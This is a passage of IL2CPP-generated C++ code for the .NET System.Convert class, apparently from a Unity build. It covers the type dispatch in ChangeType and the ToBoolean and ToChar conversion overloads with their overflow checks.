argument*/NULL); if (!L_102) { goto IL_0161; } } { RuntimeObject* L_103 = V_0; RuntimeObject* L_104 = ___provider2; int64_t L_105 = InterfaceFuncInvoker1< int64_t, RuntimeObject* >::Invoke(9 /* System.Int64 System.IConvertible::ToInt64(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_103, L_104); int64_t L_106 = L_105; RuntimeObject * L_107 = Box(Int64_t7A386C2FF7B0280A0F516992401DDFCF0FF7B436_il2cpp_TypeInfo_var, &L_106); return L_107; } IL_0161: { RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_108 = V_1; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_109 = ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->get_ConvertTypes_0(); int32_t L_110 = ((int32_t)12); RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_111 = (L_109)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_110)); IL2CPP_RUNTIME_CLASS_INIT(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var); bool L_112 = RuntimeType_op_Equality_mB551059029FC92ABEFC75A240B80302BE8302CA4(L_108, L_111, /*hidden argument*/NULL); if (!L_112) { goto IL_017e; } } { RuntimeObject* L_113 = V_0; RuntimeObject* L_114 = ___provider2; uint64_t L_115 = InterfaceFuncInvoker1< uint64_t, RuntimeObject* >::Invoke(10 /* System.UInt64 System.IConvertible::ToUInt64(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_113, L_114); uint64_t L_116 = L_115; RuntimeObject * L_117 = Box(UInt64_tA02DF3B59C8FC4A849BD207DA11038CC64E4CB4E_il2cpp_TypeInfo_var, &L_116); return L_117; } IL_017e: { RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_118 = V_1; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_119 = ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->get_ConvertTypes_0(); int32_t L_120 = ((int32_t)13); RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_121 = (L_119)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_120)); IL2CPP_RUNTIME_CLASS_INIT(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var); bool L_122 = RuntimeType_op_Equality_mB551059029FC92ABEFC75A240B80302BE8302CA4(L_118, L_121, /*hidden argument*/NULL); if (!L_122) { goto IL_019b; } } { RuntimeObject* L_123 = V_0; RuntimeObject* L_124 = ___provider2; float L_125 = InterfaceFuncInvoker1< float, RuntimeObject* >::Invoke(11 /* System.Single System.IConvertible::ToSingle(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_123, L_124); float L_126 = L_125; RuntimeObject * L_127 = Box(Single_tDDDA9169C4E4E308AC6D7A824F9B28DC82204AE1_il2cpp_TypeInfo_var, &L_126); return L_127; } IL_019b: { RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_128 = V_1; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_129 = ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->get_ConvertTypes_0(); int32_t L_130 = ((int32_t)14); RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_131 = (L_129)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_130)); IL2CPP_RUNTIME_CLASS_INIT(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var); bool L_132 = RuntimeType_op_Equality_mB551059029FC92ABEFC75A240B80302BE8302CA4(L_128, L_131, /*hidden argument*/NULL); if (!L_132) { goto IL_01b8; } } { RuntimeObject* L_133 = V_0; RuntimeObject* L_134 = ___provider2; double L_135 = InterfaceFuncInvoker1< double, RuntimeObject* >::Invoke(12 /* System.Double System.IConvertible::ToDouble(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_133, L_134); double L_136 = L_135; RuntimeObject * L_137 = Box(Double_t358B8F23BDC52A5DD700E727E204F9F7CDE12409_il2cpp_TypeInfo_var, &L_136); return L_137; } IL_01b8: { RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_138 = V_1; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_139 = ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->get_ConvertTypes_0(); int32_t L_140 = ((int32_t)15); RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_141 = (L_139)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_140)); IL2CPP_RUNTIME_CLASS_INIT(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var); bool L_142 = RuntimeType_op_Equality_mB551059029FC92ABEFC75A240B80302BE8302CA4(L_138, L_141, /*hidden argument*/NULL); if (!L_142) { goto IL_01d5; } } { RuntimeObject* L_143 = V_0; RuntimeObject* L_144 = ___provider2; Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_145 = InterfaceFuncInvoker1< Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 , RuntimeObject* >::Invoke(13 /* System.Decimal System.IConvertible::ToDecimal(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_143, L_144); Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_146 = L_145; RuntimeObject * L_147 = Box(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_il2cpp_TypeInfo_var, &L_146); return L_147; } IL_01d5: { RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_148 = V_1; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_149 = ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->get_ConvertTypes_0(); int32_t L_150 = ((int32_t)16); RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_151 = (L_149)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_150)); IL2CPP_RUNTIME_CLASS_INIT(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var); bool L_152 = RuntimeType_op_Equality_mB551059029FC92ABEFC75A240B80302BE8302CA4(L_148, L_151, /*hidden argument*/NULL); if (!L_152) { goto IL_01f2; } } { RuntimeObject* L_153 = V_0; RuntimeObject* L_154 = ___provider2; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_155 = InterfaceFuncInvoker1< DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 , RuntimeObject* >::Invoke(14 /* System.DateTime System.IConvertible::ToDateTime(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_153, L_154); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_156 = L_155; RuntimeObject * L_157 = Box(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var, &L_156); return L_157; } IL_01f2: { RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_158 = V_1; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_159 = ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->get_ConvertTypes_0(); int32_t L_160 = ((int32_t)18); RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_161 = (L_159)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_160)); IL2CPP_RUNTIME_CLASS_INIT(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var); bool L_162 = RuntimeType_op_Equality_mB551059029FC92ABEFC75A240B80302BE8302CA4(L_158, L_161, /*hidden argument*/NULL); if (!L_162) { goto IL_020a; } } { RuntimeObject* L_163 = V_0; RuntimeObject* L_164 = ___provider2; String_t* L_165 = InterfaceFuncInvoker1< String_t*, RuntimeObject* >::Invoke(15 /* System.String System.IConvertible::ToString(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_163, L_164); return L_165; } IL_020a: { RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_166 = V_1; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_167 = ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->get_ConvertTypes_0(); int32_t L_168 = 1; RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_169 = (L_167)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_168)); IL2CPP_RUNTIME_CLASS_INIT(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var); bool L_170 = RuntimeType_op_Equality_mB551059029FC92ABEFC75A240B80302BE8302CA4(L_166, L_169, /*hidden argument*/NULL); if (!L_170) { goto IL_021b; } } { RuntimeObject * L_171 = ___value0; return L_171; } IL_021b: { RuntimeObject* L_172 = V_0; Type_t * L_173 = ___conversionType1; RuntimeObject* L_174 = ___provider2; RuntimeObject * L_175 = InterfaceFuncInvoker2< RuntimeObject *, Type_t *, RuntimeObject* >::Invoke(16 /* System.Object System.IConvertible::ToType(System.Type,System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_172, L_173, L_174); return L_175; } } // System.Boolean System.Convert::ToBoolean(System.Object,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR bool Convert_ToBoolean_m881535C7C6F8B032F5883E7F18A90C27690FB5E4 (RuntimeObject * ___value0, RuntimeObject* ___provider1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToBoolean_m881535C7C6F8B032F5883E7F18A90C27690FB5E4_MetadataUsageId); s_Il2CppMethodInitialized = true; } { RuntimeObject * L_0 = ___value0; if (!L_0) { goto IL_0010; } } { RuntimeObject * L_1 = ___value0; RuntimeObject* L_2 = ___provider1; bool L_3 = InterfaceFuncInvoker1< bool, RuntimeObject* >::Invoke(1 /* System.Boolean System.IConvertible::ToBoolean(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, ((RuntimeObject*)Castclass((RuntimeObject*)L_1, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var)), L_2); return L_3; } IL_0010: { return (bool)0; } } // System.Boolean System.Convert::ToBoolean(System.SByte) extern "C" IL2CPP_METHOD_ATTR bool Convert_ToBoolean_mB7E94BAE3523E19C8743457112EC6B76B775AC44 (int8_t ___value0, const RuntimeMethod* method) { { int8_t L_0 = ___value0; return (bool)((!(((uint32_t)L_0) <= ((uint32_t)0)))? 1 : 0); } } // System.Boolean System.Convert::ToBoolean(System.Byte) extern "C" IL2CPP_METHOD_ATTR bool Convert_ToBoolean_mC149366F949BE8368C7C7C7BF3830DE15EA40AA8 (uint8_t ___value0, const RuntimeMethod* method) { { uint8_t L_0 = ___value0; return (bool)((!(((uint32_t)L_0) <= ((uint32_t)0)))? 1 : 0); } } // System.Boolean System.Convert::ToBoolean(System.Int16) extern "C" IL2CPP_METHOD_ATTR bool Convert_ToBoolean_m06007FC94CD66F1273731E389C6C7DC24B02B505 (int16_t ___value0, const RuntimeMethod* method) { { int16_t L_0 = ___value0; return (bool)((!(((uint32_t)L_0) <= ((uint32_t)0)))? 1 : 0); } } // System.Boolean System.Convert::ToBoolean(System.UInt16) extern "C" IL2CPP_METHOD_ATTR bool Convert_ToBoolean_m1AFE52438BC600124643ECEB4EDF9C3FE21171FE (uint16_t ___value0, const RuntimeMethod* method) { { uint16_t L_0 = ___value0; return (bool)((!(((uint32_t)L_0) <= ((uint32_t)0)))? 1 : 0); } } // System.Boolean System.Convert::ToBoolean(System.Int32) extern "C" IL2CPP_METHOD_ATTR bool Convert_ToBoolean_m30441623AE02A6C619CB77CD91B6A6199B90BC94 (int32_t ___value0, const RuntimeMethod* method) { { int32_t L_0 = ___value0; return (bool)((!(((uint32_t)L_0) <= ((uint32_t)0)))? 1 : 0); } } // System.Boolean System.Convert::ToBoolean(System.UInt32) extern "C" IL2CPP_METHOD_ATTR bool Convert_ToBoolean_m26CFF98BC762FA7371C580FB19013250FD567F46 (uint32_t ___value0, const RuntimeMethod* method) { { uint32_t L_0 = ___value0; return (bool)((!(((uint32_t)L_0) <= ((uint32_t)0)))? 1 : 0); } } // System.Boolean System.Convert::ToBoolean(System.Int64) extern "C" IL2CPP_METHOD_ATTR bool Convert_ToBoolean_m6EB15B3E1D9AC269065DB500E880A81AA42AF5E7 (int64_t ___value0, const RuntimeMethod* method) { { int64_t L_0 = ___value0; return (bool)((!(((uint64_t)L_0) <= ((uint64_t)(((int64_t)((int64_t)0))))))? 1 : 0); } } // System.Boolean System.Convert::ToBoolean(System.UInt64) extern "C" IL2CPP_METHOD_ATTR bool Convert_ToBoolean_m545BC5397A9E121A21E4891E2A76A8C2B31D59D2 (uint64_t ___value0, const RuntimeMethod* method) { { uint64_t L_0 = ___value0; return (bool)((!(((uint64_t)L_0) <= ((uint64_t)(((int64_t)((int64_t)0))))))? 1 : 0); } } // System.Boolean System.Convert::ToBoolean(System.String,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR bool Convert_ToBoolean_mB50CA6A7A647629B5CCC6BA10A06903B1912AF40 (String_t* ___value0, RuntimeObject* ___provider1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToBoolean_mB50CA6A7A647629B5CCC6BA10A06903B1912AF40_MetadataUsageId); s_Il2CppMethodInitialized = true; } { String_t* L_0 = ___value0; if (L_0) { goto IL_0005; } } { return (bool)0; } IL_0005: { String_t* L_1 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(Boolean_tB53F6830F670160873277339AA58F15CAED4399C_il2cpp_TypeInfo_var); bool L_2 = Boolean_Parse_m82CC57BC939797529A5CC485B6C26E8CE67A646F(L_1, /*hidden argument*/NULL); return L_2; } } // System.Boolean System.Convert::ToBoolean(System.Single) extern "C" IL2CPP_METHOD_ATTR bool Convert_ToBoolean_mC00CC1575D48C5527CFADA8E1B2328E88341F86A (float ___value0, const RuntimeMethod* method) { { float L_0 = ___value0; return (bool)((((int32_t)((((float)L_0) == ((float)(0.0f)))? 1 : 0)) == ((int32_t)0))? 1 : 0); } } // System.Boolean System.Convert::ToBoolean(System.Double) extern "C" IL2CPP_METHOD_ATTR bool Convert_ToBoolean_m23B521E072296AA7D4F9FA80D35E27C306B5ABDF (double ___value0, const RuntimeMethod* method) { { double L_0 = ___value0; return (bool)((((int32_t)((((double)L_0) == ((double)(0.0)))? 1 : 0)) == ((int32_t)0))? 1 : 0); } } // System.Boolean System.Convert::ToBoolean(System.Decimal) extern "C" IL2CPP_METHOD_ATTR bool Convert_ToBoolean_m4C852F7D316D28B27B202BC731B26EA79F2955E0 (Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToBoolean_m4C852F7D316D28B27B202BC731B26EA79F2955E0_MetadataUsageId); s_Il2CppMethodInitialized = true; } { Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_0 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_il2cpp_TypeInfo_var); Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_1 = ((Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_StaticFields*)il2cpp_codegen_static_fields_for(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_il2cpp_TypeInfo_var))->get_Zero_7(); bool L_2 = Decimal_op_Inequality_m18DB27574F40577B4D0D3C732BDA45135B41FD3D(L_0, L_1, /*hidden argument*/NULL); return L_2; } } // System.Char System.Convert::ToChar(System.Object,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR Il2CppChar Convert_ToChar_m94EF86BDBD5110CF4C652C48A625F546AA24CE95 (RuntimeObject * ___value0, RuntimeObject* ___provider1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToChar_m94EF86BDBD5110CF4C652C48A625F546AA24CE95_MetadataUsageId); s_Il2CppMethodInitialized = true; } { RuntimeObject * L_0 = ___value0; if (!L_0) { goto IL_0010; } } { RuntimeObject * L_1 = ___value0; RuntimeObject* L_2 = ___provider1; Il2CppChar L_3 = InterfaceFuncInvoker1< Il2CppChar, RuntimeObject* >::Invoke(2 /* System.Char System.IConvertible::ToChar(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, ((RuntimeObject*)Castclass((RuntimeObject*)L_1, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var)), L_2); return L_3; } IL_0010: { return 0; } } // System.Char System.Convert::ToChar(System.SByte) extern "C" IL2CPP_METHOD_ATTR Il2CppChar Convert_ToChar_m5A1F3909973CE4894614B7444B430BE562456F8C (int8_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToChar_m5A1F3909973CE4894614B7444B430BE562456F8C_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int8_t L_0 = ___value0; if ((((int32_t)L_0) >= ((int32_t)0))) { goto IL_0014; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralB1681634D48A9755494C96B393FE12BE3E4C2409, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_2 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_2, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, Convert_ToChar_m5A1F3909973CE4894614B7444B430BE562456F8C_RuntimeMethod_var); } IL_0014: { int8_t L_3 = ___value0; return (((int32_t)((uint16_t)L_3))); } } // System.Char System.Convert::ToChar(System.Byte) extern "C" IL2CPP_METHOD_ATTR Il2CppChar Convert_ToChar_m2FF337FDDCAD52939473E0D7ED3FBFD49A4C2E18 (uint8_t ___value0, const RuntimeMethod* method) { { uint8_t L_0 = ___value0; return L_0; } } // System.Char System.Convert::ToChar(System.Int16) extern "C" IL2CPP_METHOD_ATTR Il2CppChar Convert_ToChar_m9F32E993218E9D544A9FCC6FE50D6501A838315F (int16_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToChar_m9F32E993218E9D544A9FCC6FE50D6501A838315F_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int16_t L_0 = ___value0; if ((((int32_t)L_0) >= ((int32_t)0))) { goto IL_0014; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralB1681634D48A9755494C96B393FE12BE3E4C2409, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_2 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_2, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, Convert_ToChar_m9F32E993218E9D544A9FCC6FE50D6501A838315F_RuntimeMethod_var); } IL_0014: { int16_t L_3 = ___value0; return (((int32_t)((uint16_t)L_3))); } } // System.Char System.Convert::ToChar(System.UInt16) extern "C" IL2CPP_METHOD_ATTR Il2CppChar Convert_ToChar_m14666E8E6027FFF4BFA6DA0563A4CAAEA6A6989B (uint16_t ___value0, const RuntimeMethod* method) { { uint16_t L_0 = ___value0; return L_0; } } // System.Char System.Convert::ToChar(System.Int32) extern "C" IL2CPP_METHOD_ATTR Il2CppChar Convert_ToChar_m5BD134B72978B879B81A824DFAC8FF29F5300245 (int32_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToChar_m5BD134B72978B879B81A824DFAC8FF29F5300245_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int32_t L_0 = ___value0; if ((((int32_t)L_0) < ((int32_t)0))) { goto IL_000c; } } { int32_t L_1 = ___value0; if ((((int32_t)L_1) <= ((int32_t)((int32_t)65535)))) { goto IL_001c; } } IL_000c: { String_t* L_2 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralB1681634D48A9755494C96B393FE12BE3E4C2409, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_3 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_3, L_2, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_3, NULL, Convert_ToChar_m5BD134B72978B879B81A824DFAC8FF29F5300245_RuntimeMethod_var); } IL_001c: { int32_t L_4 = ___value0; return (((int32_t)((uint16_t)L_4))); } } // System.Char System.Convert::ToChar(System.UInt32) extern "C" IL2CPP_METHOD_ATTR Il2CppChar Convert_ToChar_m56A1099464A288FD3AB6F82B7433DB063F671B29 (uint32_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToChar_m56A1099464A288FD3AB6F82B7433DB063F671B29_MetadataUsageId); s_Il2CppMethodInitialized = true; } { uint32_t L_0 = ___value0; if ((!(((uint32_t)L_0) > ((uint32_t)((int32_t)65535))))) { goto IL_0018; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralB1681634D48A9755494C96B393FE12BE3E4C2409, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_2 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_2, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, Convert_ToChar_m56A1099464A288FD3AB6F82B7433DB063F671B29_RuntimeMethod_var); } IL_0018: { uint32_t L_3 = ___value0; return (((int32_t)((uint16_t)L_3))); } } // System.Char System.Convert::ToChar(System.Int64) extern "C" IL2CPP_METHOD_ATTR Il2CppChar Convert_ToChar_m9171D149D77DE0FBB36CB4D91EEBDC06B2DD6F29 (int64_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToChar_m9171D149D77DE0FBB36CB4D91EEBDC06B2DD6F29_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int64_t L_0 = ___value0; if ((((int64_t)L_0) < ((int64_t)(((int64_t)((int64_t)0)))))) { goto IL_000e; } } { int64_t L_1 = ___value0; if ((((int64_t)L_1) <= ((int64_t)(((int64_t)((int64_t)((int32_t)65535))))))) { goto IL_001e; } } IL_000e: { String_t* L_2 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralB1681634D48A9755494C96B393FE12BE3E4C2409, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_3 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_3, L_2, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_3, NULL, Convert_ToChar_m9171D149D77DE0FBB36CB4D91EEBDC06B2DD6F29_RuntimeMethod_var); } IL_001e: { int64_t L_4 = ___value0; return (((int32_t)((uint16_t)L_4))); } } // System.Char System.Convert::ToChar(System.UInt64) extern "C" IL2CPP_METHOD_ATTR Il2CppChar Convert_ToChar_mBFD88FBE8D41F3FEB4049B8EF556C2D996F5F531 (uint64_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToChar_mBFD88FBE8D41F3FEB4049B8EF556C2D996F5F531_MetadataUsageId); s_Il2CppMethodInitialized = true; } { uint64_t L_0 = ___value0; if ((!(((uint64_t)L_0) > ((uint64_t)(((int64_t)((int64_t)((int32_t)65535)))))))) { goto IL_0019; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralB1681634D48A9755494C96B393FE12BE3E4C2409, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_2 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_2, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, Convert_ToChar_mBFD88FBE8D41F3FEB4049B8EF556C2D996F5F531_RuntimeMethod_var); } IL_0019: { uint64_t L_3 = ___value0; return (((int32_t)((uint16_t)L_3))); } } // System.Char System.Convert::ToChar(System.String,System.IFormatProvider) extern "C" 